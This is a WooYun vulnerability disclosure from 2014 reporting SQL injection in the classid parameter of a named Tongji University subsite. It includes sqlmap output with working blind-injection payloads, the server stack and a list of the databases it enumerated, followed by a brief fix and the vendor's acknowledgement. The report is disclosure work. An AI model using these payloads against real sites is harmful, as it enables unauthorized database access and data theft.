漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-06-09: 细节已通知厂商并且等待厂商处理中
2014-06-10: 厂商已经确认,细节仅向厂商公开
2014-06-20: 细节向核心白帽子及相关领域专家公开
2014-06-30: 细节向普通白帽子公开
2014-07-10: 细节向实习白帽子公开
2014-07-24: 细节向公众公开
简要描述:
同济大学分站SQL注入
详细说明:
http://bkzs.tongji.edu.cn/?classid=3478&id=38&t=show 存在sql注入漏洞
漏洞证明:
Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=3478 AND 9892=9892&id=38&t=show
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: classid=3478 AND SLEEP(5)&id=38&t=show
---
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=3478 AND 9892=9892&id=38&t=show
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: classid=3478 AND SLEEP(5)&id=38&t=show
---
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
available databases [7]:
[*] bzweb
[*] college_card
[*] information_schema
[*] mysql
[*] performance_schema
[*] singup
[*] test
修复方案:
参数过滤。
版权声明:转载请注明来源 Hotler0o@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:6
确认时间:2014-06-10 08:40
厂商回复:
已经通知用户进行修改
最新状态:
暂无